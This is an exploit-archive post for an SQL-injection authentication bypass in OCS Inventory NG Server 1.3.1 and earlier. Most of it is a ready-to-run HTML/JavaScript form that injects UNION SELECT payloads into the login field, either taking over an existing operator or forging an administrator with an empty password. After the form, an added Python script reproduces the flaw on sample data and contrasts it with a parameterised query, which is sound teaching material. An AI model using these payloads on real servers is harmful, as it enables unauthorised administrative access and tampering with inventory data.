
OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass

Posted on 06 May 2010

=====================================================================
OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass
=====================================================================

<!--
____________________________________________________________________________________________________

    OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass
____________________________________________________________________________________________________

    Software      : Open Computer and Software (OCS) Inventory NG
    Download      : http://www.ocsinventory-ng.org/
    Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
    Discover      : 2010-02-05
    Published     : 2010-02-17
    Version       : 1.3.1 and prior (except 1.02.1 to 1.02.3)
    Impact        : Manipulation of data
    Remote        : Yes (No authentication is needed)
____________________________________________________________________________________________________
-->

<html>
<head>
<title>OCS Inventory NG &lt;= 1.3.1 (login) Remote Authentication Bypass</title>
<script>
// Shorthand: element by id, and the currently selected value of a <select>.
function $(id)  { return document.getElementById(id); }
function $$(id) { return $(id).options[$(id).options.selectedIndex].value; }

// Point the form at the target's login handler (index.php or header.php,
// depending on the OCS version) and fill the hidden login/pass fields with
// the injected value. Both payloads end in an unbalanced single quote that
// the application's own SQL closes.
function bypass() {
  $('log').action = $('ocsreports').value + $$('meth') + '?lang=' + $$('lang');
  if ($$('type') == 0)
    // "Default": pull the real row of an existing operator (keeping its
    // accesslvl) but substitute an empty string for the password column.
    $('login').value = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='" + $('user').value;
  else
    // Forge a row outright: chosen login, chosen accesslvl, empty password.
    $('login').value = "' UNION SELECT '" + $('user').value + "', '" + $$('type') + "', '";
  // The empty submitted password matches the empty password column returned by the UNION.
  $('pass').value = "";
  if ($$('meth') == 'header.php')
    alert('Please go to "' + $('ocsreports').value + '" (or click on the OCS logo) !');
}
</script>
</head>
<body>
<form name="log" id="log" action="#" method="post">
<table align="center" border="0" width="450px">
<tr>
  <td><b>OCSReports :</b></td>
  <td><input type="text" id="ocsreports" size="40" value="http://127.0.0.1/ocsreports/" /></td>
</tr>
<tr>
  <td><b>Version :</b></td>
  <td>
    <select id="meth">
      <option value="index.php" selected>&lt;= 1.02 --- 1.3b2 &lt;=&gt; 1.3b3</option>
      <option value="header.php">&lt;= 1.0 (4100) --- 1.3b2 &lt;=&gt; 1.3.1</option>
    </select>
  </td>
</tr>
<tr>
  <td><b>Login :</b></td>
  <td><input type="text" id="user" size="40" value="admin" /></td>
</tr>
<tr>
  <td><b>Type :</b></td>
  <td>
    <select id='type'>
      <option value=0>Default (if login exists)</option>
      <option value=1>Administrator</option>
      <option value=2>User</option>
      <option value=3>Local user</option>
    </select>
  </td>
</tr>
<tr>
  <td><b>Language :</b></td>
  <td>
    <select id="lang">
      <option value="english" selected>English</option>
      <option value="french">French</option>
      <option value="german">German</option>
      <option value="spanish">Spanish</option>
    </select>
  </td>
</tr>
<tr>
  <td>
    <input type="hidden" name="login" id="login" />
    <input type="hidden" name="pass" id="pass" />
  </td>
  <td><input type="submit" name="subLogin" onclick="bypass();"></td>
</tr>
</table>
</form>
</body>
</html>

# Inj3ct0r.com [2010-05-06]
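The script below is an added example, not OCS Inventory code and not part of the advisory. It models the flawed login check with sqlite3 under an assumed query shape that is consistent with the three-column UNION payloads above (a query that selects id, accesslvl and a password column by login, with the password compared afterwards), runs both payload families from the form against that check and against a parameterised version, and uses constructed operator rows. If the real code hashed the submitted password before comparing, the attacker would forge the hash of the empty string instead of '' in the third column; the mechanism is unchanged.

```python
import sqlite3

# Constructed sample data. The real OCS schema and password storage are not
# reproduced; this shape is an assumption matching the payloads' three columns.
OPERATORS = [
    ("admin", "correct horse", 1),   # accesslvl 1: administrator
    ("bob",   "hunter2",       2),   # accesslvl 2: plain user
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE operators (id TEXT, passwd TEXT, accesslvl INTEGER)")
    conn.executemany("INSERT INTO operators VALUES (?, ?, ?)", OPERATORS)
    conn.commit()
    return conn


def vulnerable_login(conn, login, password):
    """Assumed shape of the flawed check: the login is concatenated into the
    SQL, and the password is compared afterwards against whatever the query
    returned in its third column. A UNION in the login therefore lets the
    attacker dictate that column (and accesslvl) outright."""
    sql = "SELECT id, accesslvl, passwd FROM operators WHERE id='%s'" % login
    row = conn.execute(sql).fetchone()
    if row is None or row[2] != password:
        return None
    return row[0], row[1]


def safe_login(conn, login, password):
    """Parameterised variant: the login is bound as data, so the quote and the
    UNION inside the payload are just characters of a non-existent user id."""
    row = conn.execute(
        "SELECT id, accesslvl, passwd FROM operators WHERE id=?", (login,)
    ).fetchone()
    if row is None or row[2] != password:
        return None
    return row[0], row[1]


# The two payload families from the advisory's form, with login 'admin'.
# Each ends in an unbalanced quote that the application's own SQL closes.
PAYLOAD_EXISTING = "' UNION SELECT id, accesslvl, '' FROM operators WHERE id='admin"
PAYLOAD_FORGED = "' UNION SELECT 'admin', '1', '"


def demo():
    conn = make_db()
    return {
        "normal":        vulnerable_login(conn, "admin", "correct horse"),
        "wrong_pw":      vulnerable_login(conn, "admin", "nope"),
        "existing":      vulnerable_login(conn, PAYLOAD_EXISTING, ""),
        "forged":        vulnerable_login(conn, PAYLOAD_FORGED, ""),
        "safe_existing": safe_login(conn, PAYLOAD_EXISTING, ""),
        "safe_forged":   safe_login(conn, PAYLOAD_FORGED, ""),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-14s %r" % (name, result))
```

Against the concatenating check both payloads log in with an empty password: the first returns the real admin row with its stored accesslvl, the second returns a row the database never held, with accesslvl taken from the "Type" selector. Against the bound-parameter query the same strings simply match no operator. Note that the forged row's accesslvl arrives as the text '1' rather than an integer, which is why any downstream authorisation code should also not trust the type of values coming back from a query it cannot fully control.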